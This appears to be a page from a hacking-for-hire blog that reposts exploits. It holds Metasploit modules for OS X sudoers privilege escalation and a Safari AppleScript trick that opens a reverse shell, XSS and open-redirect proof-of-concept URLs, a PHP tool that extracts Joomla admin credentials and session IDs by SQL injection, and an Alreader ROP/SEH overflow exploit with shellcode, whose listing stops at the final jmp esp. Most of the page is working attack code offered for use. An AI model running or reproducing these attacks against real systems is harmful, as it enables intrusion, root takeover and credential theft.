Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863153521

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Local

  Rank = NormalRanking

  include Msf::Post::OSX::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation',
      'Description'    => %q{
        This module writes to the sudoers file without root access by exploiting rsh and malloc log files.
        Makes sudo require no password, giving access to su even if root is disabled.
        Works on OS X 10.9.5 to 10.10.5 (patched on 10.11).
      },
      'Author'         => [
        'rebel',      # Vulnerability discovery and PoC
        'shandelman116'  # Copy/paste AND translator monkey
      ],
      'References'     => [
        ['EDB', '38371'],
        ['CVE', '2015-5889']
      ],
      'DisclosureDate' => 'Oct 1 2015',
      'License'        => MSF_LICENSE,
      # Want to ensure that this can be used on Python Meterpreter sessions as well
      'Platform'       => ['osx', 'python'],
      'Arch'           => [ARCH_X86_64, ARCH_PYTHON],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Privileged'     => true,
      'Targets'        => [
        ['Mac OS X 10.9.5-10.10.5', {}]
      ],
      'DefaultTarget'  => 0,
      'DefaultOptions' => {
        'PAYLOAD'         => 'osx/x64/shell_reverse_tcp'
      }
    ))

    register_options(
      [
        OptInt.new('WaitTime', [true, 'Seconds to wait for exploit to work', 60]),
        OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
      ], self.class
    )
  end

  def exploit
    # Check OS
    os_check

    # Check if crontab file existed already so it can be restored at cleanup
    if file_exist? "/etc/crontab"
      @crontab_original = read_file("/etc/crontab")
    else
      @crontab_original = nil
    end

    # Writing payload
    if payload.arch.include? ARCH_X86_64
      vprint_status("Writing payload to #{payload_file}.")
      write_file(payload_file, payload_source)
      vprint_status("Finished writing payload file.")
      register_file_for_cleanup(payload_file)
    elsif payload.arch.include? ARCH_PYTHON
      vprint_status("No need to write payload. Will simply execute after exploit")
      vprint_status("Payload encodeded is #{payload.encoded}")
    end

    # Run exploit
    sploit

    # Execute payload
    print_status('Executing payload...')
    if payload.arch.include? ARCH_X86_64
      cmd_exec("chmod +x #{payload_file}; #{payload_file} & disown")
    elsif payload.arch.include? ARCH_PYTHON
      cmd_exec("python -c \"#{payload.encoded}\" & disown")
    end
    vprint_status("Finished executing payload.")
  end

  def os_check
    # Get sysinfo
    sysinfo = get_sysinfo
    # Make sure its OS X (Darwin)
    unless sysinfo["Kernel"].include? "Darwin"
      print_warning("The target system does not appear to be running OS X!")
      print_warning("Kernel information: #{sysinfo['Kernel']}")
      return
    end
    # Make sure its not greater than 10.5 or less than 9.5
    version = sysinfo["ProductVersion"]
    minor_version = version[3...version.length].to_f
    unless minor_version >= 9.5 && minor_version <= 10.5
      print_warning("The target version of OS X does not appear to be compatible with the exploit!")
      print_warning("Target is running OS X #{sysinfo['ProductVersion']}")
    end
  end

  def sploit
    user = cmd_exec("whoami").chomp
    vprint_status("The current effective user is #{user}. Starting the sploit")
    # Get size of sudoers file
    sudoer_path = "/etc/sudoers"
    size = get_stat_size(sudoer_path)

    # Set up the environment and command for spawning rsh and writing to crontab file
    rb_script = "e={\"MallocLogFile\"=>\"/etc/crontab\",\"MallocStackLogging\"=>\"yes\",\"MallocStackLoggingDirectory\"=>\"a\n* * * * * root echo \\\"ALL ALL=(ALL) NOPASSWD: ALL\\\" >> /etc/sudoers\n\n\n\n\n\"}; Process.spawn(e,[\"/usr/bin/rsh\",\"rsh\"],\"localhost\",[:out, :err]=>\"/dev/null\")"
    rb_cmd = "ruby -e '#{rb_script}'"

    # Attempt to execute
    print_status("Attempting to write /etc/crontab...")
    cmd_exec(rb_cmd)
    vprint_status("Now to check whether the script worked...")

    # Check whether it worked
    crontab = cmd_exec("cat /etc/crontab")
    vprint_status("Reading crontab yielded the following response: #{crontab}")
    unless crontab.include? "ALL ALL=(ALL) NOPASSWD: ALL"
      vprint_error("Bad news... it did not write to the file.")
      fail_with(Failure::NotVulnerable, "Could not successfully write to crontab file.")
    end

    print_good("Succesfully wrote to crontab file!")

    # Wait for sudoers to change
    new_size = get_stat_size(sudoer_path)
    print_status("Waiting for sudoers file to change...")

    # Start timeout block
    begin
      Timeout.timeout(datastore['WaitTime']) {
        while new_size <= size
          Rex.sleep(1)
          new_size = get_stat_size(sudoer_path)
        end
      }
    rescue Timeout::Error
      fail_with(Failure::TimeoutExpired, "Sudoers file size has still not changed after waiting the maximum amount of time. Try increasing WaitTime.")
    end
    print_good("Sudoers file has changed!")

    # Confirming root access
    print_status("Attempting to start root shell...")
    cmd_exec("sudo -s su")
    user = cmd_exec("whoami")
    unless user.include? "root"
      fail_with(Failure::UnexpectedReply, "Unable to acquire root access. Whoami returned: #{user}")
    end
    print_good("Success! Acquired root access!")
  end

  def get_stat_size(file_path)
    cmd = "env -i [$(stat -s #{file_path})] bash -c 'echo $st_size'"
    response = cmd_exec(cmd)
    vprint_status("Response to stat size query is #{response}")
    begin
      size = Integer(response)
      return size
    rescue ArgumentError
      fail_with(Failure::UnexpectedReply, "Could not get stat size!")
    end
  end

  def payload_source
    if payload.arch.include? ARCH_X86_64
      return Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
    elsif payload.arch.include? ARCH_PYTHON
      return payload.encoded
    end
  end

  def payload_file
    @payload_file ||=
      "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
  end

  def cleanup
    vprint_status("Starting the cron restore process...")
    super
    # Restore crontab back to is original state
    # If we don't do this, then cron will continue to append the no password rule to sudoers.
    if @crontab_original.nil?
      # Erase crontab file and kill cron process since it did not exist before
      vprint_status("Killing cron process and removing crontab file since it did not exist prior to exploit.")
      rm_ret = cmd_exec("rm /etc/crontab 2>/dev/null; echo $?")
      if rm_ret.chomp.to_i == 0
        vprint_good("Successfully removed crontab file!")
      else
        print_warning("Could not remove crontab file.")
      end
      Rex.sleep(1)
      kill_ret = cmd_exec("killall cron 2>/dev/null; echo $?")
      if kill_ret.chomp.to_i == 0
        vprint_good("Succesfully killed cron!")
      else
        print_warning("Could not kill cron process.")
      end
    else
      # Write back the original content of crontab
      vprint_status("Restoring crontab file back to original contents. No need for it anymore.")
      cmd_exec("echo '#{@crontab_original}' > /etc/crontab")
    end
    vprint_status("Finished the cleanup process.")
  end
end
HireHackking 
source: https://www.securityfocus.com/bid/60198/info

ADIF Log Search widget plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

ADIF Log Search 1.0e is vulnerable; other versions may also be affected. 

http://www.example.com/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E<http://www.example2.com/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E>
HireHackking 
source: https://www.securityfocus.com/bid/60172/info

Barracuda SSL VPN 680 is prone to an open-redirection vulnerability.

An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.

Barracuda SSL VPN 680 2.2.2.203 is vulnerable; other versions may also be affected. 

https://www.example.com/launchApplication.do?resourceId=1&policy=1&returnTo=%2FshowApplicationShortcuts.do
https://www.exmaple.com/launchApplication.do?resourceId=1&policy=1&returnTo=http://www.example.com
https://www.exmaple.com/[FILE].do?[RES+ID]=x&[POLICY]=x&returnTo=[EXTERNAL TARGET]
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Safari User-Assisted Applescript Exec Attack',
      'Description'    => %q{
        In versions of Mac OS X before 10.11.1, the applescript:// URL
        scheme is provided, which opens the provided script in the Applescript
        Editor. Pressing cmd-R in the Editor executes the code without any
        additional confirmation from the user. By getting the user to press
        cmd-R in Safari, and by hooking the cmd-key keypress event, a user
        can be tricked into running arbitrary Applescript code.

        Gatekeeper should be disabled from Security & Privacy in order to
        avoid the unidentified Developer prompt.
      },
      'License'         => MSF_LICENSE,
      'Arch'            => ARCH_CMD,
      'Platform'        => ['unix', 'osx'],
      'Compat'          =>
        {
          'PayloadType' => 'cmd'
        },
      'Targets'         =>
        [
          [ 'Mac OS X', {} ]
        ],
      'DefaultOptions' => { 'payload' => 'cmd/unix/reverse_python' },
      'DefaultTarget'   => 0,
      'DisclosureDate'  => 'Oct 16 2015',
      'Author'          => [ 'joev' ],
      'References'     =>
        [
          [ 'CVE', '2015-7007' ],
          [ 'URL', 'https://support.apple.com/en-us/HT205375' ]
        ],
      'BrowserRequirements' => {
        :source  => 'script',
        :ua_name => HttpClients::SAFARI,
        :os_name => OperatingSystems::Match::MAC_OSX
      }
    ))

    register_options([
      OptString.new('CONTENT', [false, "Content to display in browser",
        "This page has failed to load. Press cmd-R to refresh."]),
      OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
    ], self.class)
  end

  def on_request_exploit(cli, request, profile)
    print_status("Sending #{self.name}")
    send_response_html(cli, exploit_html)
  end

  def exploit_html
    "<!doctype html><html><body>#{content}<script>#{exploit_js}</script></body></html>"
  end

  def exploit_js
    js_obfuscate %Q|
      var as = Array(150).join("\\n") +
        'do shell script "echo #{Rex::Text.encode_base64(sh)} \| base64 --decode \| /bin/sh"';
      var url = 'applescript://com.apple.scripteditor?action=new&script='+encodeURIComponent(as);
      window.onkeydown = function(e) {
        if (e.keyCode == 91) {
          window.location = url;
        }
      };
    |
  end

  def sh
    'killall "Script Editor"; nohup ' + payload.encoded
  end

  def content
    datastore['CONTENT']
  end


end
HireHackking 
<?php session_start();
error_reporting(0);
set_time_limit(0);

$head = '
<html>
<head>
<link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTLfLXmLeMSTt0jOXREfgvdp8IYWnE9_t49PpAiJNvwHTqnKkL4" rel="icon" type="image/x-icon"/>
</script>
<title>--==[[Mannu joomla SQL Injection exploiter by Team Indishell]]==--</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<STYLE>
body {
font-family: Tahoma;
color: white;
background: #444444;
}

input {
border			: solid 2px ;
border-color		: black;
BACKGROUND-COLOR: #444444;
font: 8pt Verdana;

color: white;
}

submit {
BORDER:  buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}

#t input[type=\'submit\']{
	COLOR: White;
	border:none;
	BACKGROUND-COLOR: black;
}

#t input[type=\'submit\']:hover {
	
	BACKGROUND-COLOR: #ff9933;
	color: black;
	
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 0px ;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 2px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: #191919;;
color: #FFF;
}
textarea {
border			: dashed 2px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
A:link {
border: 1px;
	COLOR: red; TEXT-DECORATION: none
}
A:visited {
	COLOR: red; TEXT-DECORATION: none
}
A:hover {
	color: White; TEXT-DECORATION: none
}
A:active {
	color: white; TEXT-DECORATION: none
}
</STYLE>
<script type="text/javascript">
<!--
    function lhook(id) {
       var e = document.getElementById(id);
       if(e.style.display == \'block\')
          e.style.display = \'none\';
       else
          e.style.display = \'block\';
    }
//-->
</script>
'; 



		echo $head ;
		echo '

<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >

			

       <td width="100%" align=center valign="top" rowspan="1">
           <font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ Mannu, Joomla </font><font color=white size=5 face="comic sans ms"><b>SQL Injection exploiter By Team </font><font color=green size=5 face="comic sans ms"><b> INDIShEll]]==--</font> <div class="hedr"> 

        <td height="10" align="left" class="td1"></td></tr><tr><td 
        width="100%" align="center" valign="top" rowspan="1"><font 
        color="red" face="comic sans ms"size="1"><b> 
        <font color=#ff9933> 
        ##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font><br><font color=white>
        -==[[Greetz to]]==--</font><br> <font color=#ff9933>Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indisHell,Baba ,Silent poison India,Magnum sniper,ethicalnoob IndisHell,Local root indisHell,Irfninja indisHell<br>Reborn India,L0rd Crus4d3r,cool toad,Hackuin,Alicks,Dinelson Amine,Th3 D3str0yer,SKSking,rad paul,Godzila,mike waals,zoo zoo,cyber warrior,Neo hacker ICA<br>cyber gladiator,7he Cre4t0r,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk and rest of TEAM INDISHELL<br>
<font color=white>--==[[Love to]]==--</font><br># My Father , my Ex Teacher,cold fire HaCker,Mannu, ViKi,Suriya Cyber Tyson ,Ashu bhai ji,Soldier Of God,almas malik, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,Govind singh,Budhaoo,Don(Deepika kaushik) and acche bacchi(Jagriti) <br>
<font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>GCE College ke DON :D</font>        <br></font>
        <b> 
        <font color=#ff9933> 
        ##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font>
						
           </table>
       </table> <br>

';
?>
<div align=center>
<form method=post>
<input type=input name=in value=target>
<input type=submit name=sm value="check version">

<?php
 function data($lu)
{
	$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $lu);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
$result['EXE'] = curl_exec($ch);
curl_close($ch);
return $result['EXE'];


}


if(isset($_POST['sm']))
{
$target=trim($_POST['in']);
$finalurl=$target."/language/en-GB/en-GB.xml";

$data=file_get_contents($finalurl);	
$ar0=explode("<version>", $data);
$ar1=explode("</version>", $ar0[1]);
$ar=trim($ar1[0]);
echo "<br>";
$v=explode(".",$ar);


if($v[0]<=3)
{
	//echo "<br><br> Joomla version is 3.*.*";
	
		
		//echo "<br> yes yes >:D<, fas gaya billu ";
		echo "<br>click below button to exploit it :v <br><br>" ;
		echo "<form method=post><input type=hidden name=tar value=".$target.">";
		echo "<input type=submit name=sm1 value=\"Chal billu, ghuma de soday ne xD\">";
	
	
}
else{
	
	echo "joomla version is below 3";
}

}

if(isset($_POST['sm1']))
{

$tar=$_POST['tar']."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select+1+from+(select+count(*),+concat((select+(select+concat(password))+from+icalab_users+LIMIT+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)";

$dat=data($tar); 
$ar0=explode("LEFT JOIN", $dat);
$ar1=explode("_users", $ar0[1]);
$ar=trim($ar1[0]);

$rt=str_replace("icalab",$ar,$tar);
$tr=data($rt);
$ar0=explode("Duplicate entry", $tr);
$ar1=explode("for key", $ar0[1]);


 $rt2=str_replace("password","username,0x7e",$rt);
$tr2=data($rt2);
$ar2=explode("Duplicate entry", $tr2);
$ar3=explode("for key", $ar2[1]);

if($ar3[0]!='' && $ar1[0]!='')
{
echo "<br><br> 	Target gone 8-)<br><br>website name:- ".$_POST['tar']." <br>-------------------------------<br> <br>";
echo "username is --> ".str_replace("~1","",trim($ar3[0]))." <br>Password Hash is --> ".str_replace("~1","",trim($ar1[0]));
echo "<br>Admin session ID is<br></div>";
$sessionid=$_POST['tar']."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select+1+from+(select+count(*),+concat((select+(select+concat(session_id))+from+".$ar."_session+where+username='admin'+LIMIT+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)";

$ses=data($sessionid);
$ar0=explode("Duplicate entry", $ses);
$ar1=explode("for key", $ar0[1]);
echo trim($ar1[0]);
}
}

?>
<!-- 3.2.* to 3.4.4 -->
HireHackking 
#!/usr/bin/env python

#*************************************************************************************************************
# Exploit Title:          Alreader 2.5 .fb2 SEH Based Stack Overflow (ASLR and DEP bypass)
# Date:                   25.10.2015
# Category:               Local Exploit
# Exploit Author:         g00dv1n
# Contact:                g00dv1n.private@gmail.com
# Version:                2.5
# Tested on:              Windows XP SP3 / Windows 7 / Windows 8 
# Vendor Homepage:        http://www.alreader.com/index.php?lang=en
# Software Link (ENG):    http://www.alreader.com/download.php?file=AlReader2.Win32.en.zip
# Software Link (RU):     http://www.alreader.com/download.php?file=AlReader2.Win32.ru.zip
# CVE: 



# Description:
# Alreader 2.5 its  free FB2 reader for Windows. 
# FB2 format its just XML. FB2 contain   <author> <first-name> </first-name>  </author>  block. 
# Overflow occurs if you create a long name of the author.
# App used WCHAR  (1 char - 2 bytes ). If we create file in UTF-8 then app turn every single byte into two.
# For example 41 41  -  00 41 00 41
# So We should use UTF-16. 
#
# Also, we can use single null byte in payload.
# 
# 
#
# Instructions:  
# 1. Run this py script for generate AlReader-fb2-PoC-exploit.fb2 file.
# 2. Run Alreader.exe
# 3. Open AlReader-fb2-PoC-exploit.fb2 ( FILE -> Open )
# 4. Enjoy running Calc.exe
#
# Exploit owerview:
# For bypass ALSR I used a ROP style. Main module Alreader2.exe non-ALSR. It also contain calls GetModuleHandleW
# and GetProcAdress. So using this functions I can get pointer to call VirtualProtect to make stack executable and
# run Shellcode.
#
# At overflow overwritten SEH. So we can control EIP. For this spray Jump Adress in payload 
# ( It is necessary to adjust the offset in different systems .)
# Then to get control of the stack we need ADD to ESP some value. (ADD ESP, 808h). Then ESP will point to ROP NOP 
# ( It is necessary to adjust the offset in different systems .)
# Then the control get ROP chain .
# 
# Program have Russian (RU) and English (Eng) versions. 
# ROP chains for them the same but different addresses. ( addresses of ADD ESP, 808h and ROP NOP same for all versions )
# For a combination of two versions into one exploit I place two ROP chains one after another.
# For RU version then an exception occurs, control passes first ROP chain. (ADD ESP, 808h RETN 4 then ROP NOPs )
# For Eng version after ADD ESP, 808h RETN 4 and ROP NOPs  arises yet another exepiton and Call ADD ESP, 808h.
# So ESP jump over first ROP chain. ROP NOP correct offset and Second ROP chain for Eng version, get control.
# With these tricks, the exploit works correctly for both versions.
#
# Below is ANSI-diagram of the payload: 
#
#                              =-------------------------=
#                              |          gdvn           |        just fan magic bytes       
#                              |-------------------------|                         
#                              |                         |
#                              |   jmp from SEH adress   |        x 500    Spray Andress to Jump from oveeride SEH
#                              |                         |                        (ADD ESP, 808h RETN 4) 
#                              |-------------------------|                         
#                              |                         |
#                              |        ROP NOP          |        x 500    Spray  ROP NOP (RETN)   
#                              |                         |
#                              |-------------------------|                         
#                              |                         |
#                              |      ROP chain for      |
#                              |       RU version        |
#                              |                         |
#                              |-------------------------|                         
#                              |        SHELLCODE        |        Run Calc.exe
#                              |-------------------------|                         
#                              |                         |
#                              |        ROP NOP          |        x 250     Spray  ROP NOP (RETN) 
#                              |                         |
#                              |-------------------------|                         
#                              |                         |
#                              |      ROP chain for      |
#                              |       ENG version       |
#                              |                         |
#                              |-------------------------|                          
#                              |        SHELLCODE        |        Run Calc.exe
#                              |-------------------------|                         
#                              |                         |
#                              |      ROP chain for      |
#                              |       ENG version       |
#                              |                         |
#                              |-------------------------|                          
#                              |                         |
#                              |                         |
#                              |          Junk           |        'A' x 6000
#                              |                         |                         
#                              |                         |
#                              =-------------------------=
#
#
#
# 
#
#**************************************************************************************************************




#######################################################################################################
from struct import *

#######################################################################################################
file_result = "AlReader-fb2-PoC-exploit.fb2"


########################################################################################################

fuz_text  = ''                                # init fuzzy string 




jmp_to  = pack('<I',0x00442391 )              # 0x00442391 ADD ESP, 808h RETN 4

ret_NOP =  pack('<I',0x00448147 )             # RETN


##################################### START CREATE ROP CHAINs ############################################

fuz_text += 'gdvn'                              # magic init bytes



fuz_text += jmp_to * 500                        # spray adr



fuz_text += ret_NOP * 500                       # spray RETN adr



####################################### ROP CHAIN FOR RUS VERSION ########################################

# Prepare to call GetModuleHandleW
# EDI = GetModuleHandleW adr
# ESI = ret adr 
# EBP = ptr to unicode 'kernel32.dll'
                  
ret_adr_after = pack('<I',0x0048ddd1 )          # 0x0048ddd1 :  # ADD ESP,30 # RETN    ( this need to correct ESP )
module_handlew_adr = pack('<I',0x004FC8FC )     # 0x004FC8FC GetModuleHandleW adr
kernel32_u = pack('<I',0x0560944 )              # 0x0560944 ptr to unicode 'kernel32.dll'


#0x004904a6 :  #  POP EDI # POP ESI # POP EBP # POP EBX # RETN 
fuz_text +=  pack('<I',0x004904a6 )   + module_handlew_adr + ret_adr_after + kernel32_u

fuz_text +=  '\x41' *  4

                                                
fuz_text +=  pack('<I',0x004f831c )             # 0x004f831c # ADD ESP,24 # RETN

fuz_text +=  '\x41' *  36

fuz_text += pack('<I',0x004b310d )              # 0x004b310d :  # PUSHAD # RETN

fuz_text +=  '\x41' *  28                       # correct after ADD ESP,30


#Junk
#################################################
fuz_text +=  pack('<I',0x004f831c )             # 0x004f831c # ADD ESP,24 # RETN

fuz_text +=  '\x41' *  36
#################################################

#EAX = kernel32 base adr

# Prepare to call GetProcAdress
# EDI = GetProcAdress adr
# ESI = ret adr 
# EBP = kernel32 base adr
# ESP = ptr to ANSII 'VirtualProtect00'


ret_adr_after = pack('<I',0x0048ddd1 )          # 0x0048ddd1 :  # ADD ESP,30 # RETN    ( this need to correct ESP )             

get_proc_adr  = pack('<I',0x0043C8B2 )          # 0x0043C8B2 - GetProcAdress


# 0x004904A8 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN

fuz_text += pack('<I',0x004904A8 )  + get_proc_adr +  ret_adr_after           

fuz_text +=  '\x41' *  8


fuz_text += pack('<I',0x004b9e9e )             # 0x004b9e9e :  # XCHG EAX,EBP # SETE CL # MOV EAX,ECX # RETN

fuz_text += pack('<I',0x004b310d )             # 0x004b310d :  # PUSHAD # RETN

fuz_text += 'VirtualProtect' + '\x00'

fuz_text +=  '\x41' *  17                      # correct ESP pointer 


########################################################
# Prepare registrs for Virtual protect call

# EDI = ROP NOP
# ESI = VirtualProtect adr 
# EBP = Ret adr
# ESP = auto
# EBX = 1 
# EDX = 0x40
# ECX = lpOldProtect (ptr to W address)

# Now in EAX VP adr 

fuz_text += pack('<I',0x00489cdd )              # 0x00489cdd,  # PUSH EAX # POP ESI # RETN 

fuz_text += pack('<I',0x004a6392 )              # 0x004a6392,  # POP EBX # RETN 

fuz_text += pack('<I',0x5DE58BD1 )              # 0x5DE58BD0,  # EBX = 5DE58BD1

fuz_text += pack('<I',0x004e7d31 )              # 0x004e7d31,  # SUB EBX,5DE58BD0 # RETN # EBX = 1

fuz_text += pack('<I',0x004fc23c )              # 0x004fc23c,  # XOR EDX,EDX # RETN  # EDX = 0

fuz_text += pack('<I',0x0040db04 )  * 64        # 0x0040db04,  # INC EDX # ADD AL,3B # RETN x 64 # EDX = 0x40

fuz_text += pack('<I',0x0048c064 )              # 0x0048c064,  # POP ECX # RETN 

fuz_text += pack('<I',0x00629eea )              # 0x00629eea,  # &Writable location 

fuz_text += pack('<I',0x00487d6a )              # 0x00487d6a,  # POP EDI # RETN 

fuz_text += pack('<I',0x004f4401 )              # 0x004f4401,  # RETN (ROP NOP)



fuz_text += pack('<I',0x004e6379 )              # 0x004e6379,  # POP EBP # RETN 

ret_adr_after = pack('<I',0x004f831c )          # ret adr  #  0x004f831c # ADD ESP,24 # RETN


fuz_text += ret_adr_after

fuz_text+= pack('<I',0x004ecfab )               # 0x004ecfab,  # PUSHAD # RETN 

fuz_text +=  '\x41' *  32                       # Correct poiter to ESP



fuz_text += pack('<I',0x004a37bd )              # 0x004a37bd : # jmp esp 

fuz_text += '\x90' * 16                         # NOP's :-)


##################################### END ROP CHAIN #########################################

#############################################################################################
#PASTE SHELLCODE HERE




# Run Calc
shellcode = ("\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7");


fuz_text += shellcode


############################################################################################# 
fuz_text += ret_NOP * 250                       # spray RETN adr

#############################################################################################

############################### ROP CHAIN FOR ENG VERSION ###################################







# Prepare to call GetModuleHandleW
# EDI = GetModuleHandleW adr
# ESI = ret adr 
# EBP = ptr to unicode 'kernel32.dll'
                  
ret_adr_after = pack('<I',0x004cad21 )          # 0x004cad21 :  # ADD ESP,30 # RETN    ( this need to correct ESP )
module_handlew_adr = pack('<I',0x004FC85C )     # 0x004FC85C GetModuleHandleW adr
kernel32_u = pack('<I',0x00560724 )              # 0x00560724  ptr to unicode 'kernel32.dll'


#0x00488ed6 :  # POP EDI # POP ESI # POP EBP # POP EBX # RETN 
fuz_text +=  pack('<I',0x00488ed6 )   + module_handlew_adr + ret_adr_after + kernel32_u

fuz_text +=  '\x41' *  4

                                                
fuz_text +=  pack('<I',0x004a8ee8 )             # 0x004a8ee8 # ADD ESP,24 # RETN

fuz_text +=  '\x41' *  36

fuz_text += pack('<I',0x004b3ded )              # 0x004b3ded :  # PUSHAD # RETN

fuz_text +=  '\x41' *  28                       # correct after ADD ESP,30


#Junk
#################################################
fuz_text +=  pack('<I',0x004a8ee8 )             # 0x004a8ee8 # ADD ESP,24 # RETN

fuz_text +=  '\x41' *  36
#################################################

#EAX = kernel32 base adr

# Prepare to call GetProcAdress
# EDI = GetProcAdress adr
# ESI = ret adr 
# EBP = kernel32 base adr
# ESP = ptr to ANSII 'VirtualProtect00'


ret_adr_after = pack('<I',0x004cad21 )          # 0x004cad21 :  # ADD ESP,30 # RETN    ( this need to correct ESP )             

get_proc_adr  = pack('<I',0x0043C8B2 )          # 0x0043C8B2 - GetProcAdress


# 0x00488ed6 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN

fuz_text += pack('<I',0x00488ed6 )  + get_proc_adr +  ret_adr_after           

fuz_text +=  '\x41' *  8


fuz_text += pack('<I',0x004b9dfe )             # 0x004b9dfe :  # XCHG EAX,EBP # SETE CL # MOV EAX,ECX # RETN

fuz_text += pack('<I',0x004b3ded )             # 0x004b3ded :  # PUSHAD # RETN

fuz_text += 'VirtualProtect' + '\x00'

fuz_text +=  '\x41' *  17                      # correct ESP pointer 


########################################################
# Prepare registrs for Virtual protect call

# EDI = ROP NOP
# ESI = VirtualProtect adr 
# EBP = Ret adr
# ESP = auto
# EBX = 1 
# EDX = 0x40
# ECX = lpOldProtect (ptr to W address)

# Now in EAX VP adr 

fuz_text += pack('<I',0x00489c3d )              # 0x00489c3d,  # PUSH EAX # POP ESI # RETN 

fuz_text += pack('<I',0x00481c40 )              # 0x00481c40,  # POP EBX # RETN 

fuz_text += pack('<I',0x5DE58BD1 )              # 0x5DE58BD0,  # EBX = 5DE58BD1

fuz_text += pack('<I',0x004e7c91 )              # 0x004e7c91,  # SUB EBX,5DE58BD0 # RETN # EBX = 1

fuz_text += pack('<I',0x004fc19c )              # 0x004fc19c,  # XOR EDX,EDX # RETN 

fuz_text += pack('<I',0x0040db04 )  * 64        # 0x0040db04,  # INC EDX # ADD AL,3B # RETN x 64 # EDX = 0x40

fuz_text += pack('<I',0x004f39dc )              # 0x004f39dc,  # POP ECX # RETN 

fuz_text += pack('<I',0x0062909d )              # 0x0062909d,  # &Writable location 

fuz_text += pack('<I',0x00495df4 )              # 0x00495df4,  # POP EDI # RETN 

fuz_text += pack('<I',0x00483a02 )              # 0x00483a02,  # RETN (ROP NOP)



fuz_text += pack('<I',0x004fb3c6 )              # 0x004fb3c6,  # POP EBP # RETN 

ret_adr_after = pack('<I',0x004a8ee8 )          # ret adr  #  0x004a8ee8 # ADD ESP,24 # RETN


fuz_text += ret_adr_after

fuz_text+= pack('<I',0x004b3ded )               # 0x004b3ded,  # PUSHAD # RETN 

fuz_text +=  '\x41' *  32                       # Correct poiter to ESP



fuz_text += pack('<I',0x004757a7  )              # 0x004757a7  : # jmp esp 

